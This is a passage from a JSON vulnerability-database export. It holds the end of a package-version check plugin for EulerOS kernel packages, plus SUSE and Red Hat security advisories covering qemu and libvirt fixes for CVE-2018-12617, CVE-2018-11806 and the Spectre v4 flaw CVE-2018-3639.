\"kernel-headers-3.10.0-514.44.5.10_41\",\n \"kernel-tools-3.10.0-514.44.5.10_41\",\n \"kernel-tools-libs-3.10.0-514.44.5.10_41\",\n \"kernel-tools-libs-devel-3.10.0-514.44.5.10_41\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "suse": [{"lastseen": "2018-11-10T02:37:49", "bulletinFamily": "unix", "description": "This update for qemu fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-12617: qmp_guest_file_read had an integer overflow that could\n have been exploited by sending a crafted QMP command (including\n guest-file-read with a large count value) to the agent via the listening\n socket causing DoS (bsc#1098735).\n - CVE-2018-11806: Prevent heap-based buffer overflow via incoming\n fragmented datagrams (bsc#1096223).\n\n With this release the mitigations for Spectre v4 are moved to the patches\n from upstream (CVE-2018-3639, bsc#1092885).\n\n This feature was added:\n\n - Add block resize support for disks through the monitor\n (bsc#1094725).\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n", "modified": "2018-11-10T00:23:53", "published": "2018-11-10T00:23:53", "id": "OPENSUSE-SU-2018:3709-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-11/msg00013.html", "title": "Security update for qemu (moderate)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:57", "bulletinFamily": "unix", "description": "Kernel-based Virtual Machine (KVM) is a full virtualization solution for
Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-10-30T22:22:31", "published": "2018-10-30T22:19:43", "id": "RHSA-2018:3424", "href": "https://access.redhat.com/errata/RHSA-2018:3424", "type": "redhat", "title": "(RHSA-2018:3424) Important: qemu-kvm security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:44:44", "bulletinFamily": "unix", "description": "The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). 
It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the libvirt side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-10-30T17:46:44", "published": "2018-10-30T17:44:50", "id": "RHSA-2018:3400", "href": "https://access.redhat.com/errata/RHSA-2018:3400", "type": "redhat", "title": "(RHSA-2018:3400) Important: libvirt security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:47:01", "bulletinFamily": "unix", "description": "KVM (Kernel-based Virtual Machine) is a full virtualization solution for\nLinux on a variety of architectures. The qemu-kvm-rhev packages provide the\nuser-space component for running virtual machines that use KVM in\nenvironments managed by Red Hat products.\n\nSecurity fix(es):\n* An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load & Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor's data cache even for speculatively executed instructions\nthat never actually commit (retire). 
As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639)\n\nAcknowledgements:\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center)\nand Jann Horn (Google Project Zero) for reporting this issue.\n\nNote: This is the qemu-kvm-rhev side of the CVE-2018-3639 mitigation that\nincludes support for guests running on hosts with AMD processors.\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.", "modified": "2018-08-07T18:26:22", "published": "2018-08-07T18:25:28", "id": "RHSA-2018:2363", "href": "https://access.redhat.com/errata/RHSA-2018:2363", "type": "redhat", "title": "(RHSA-2018:2363) Important: qemu-kvm-rhev security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}]}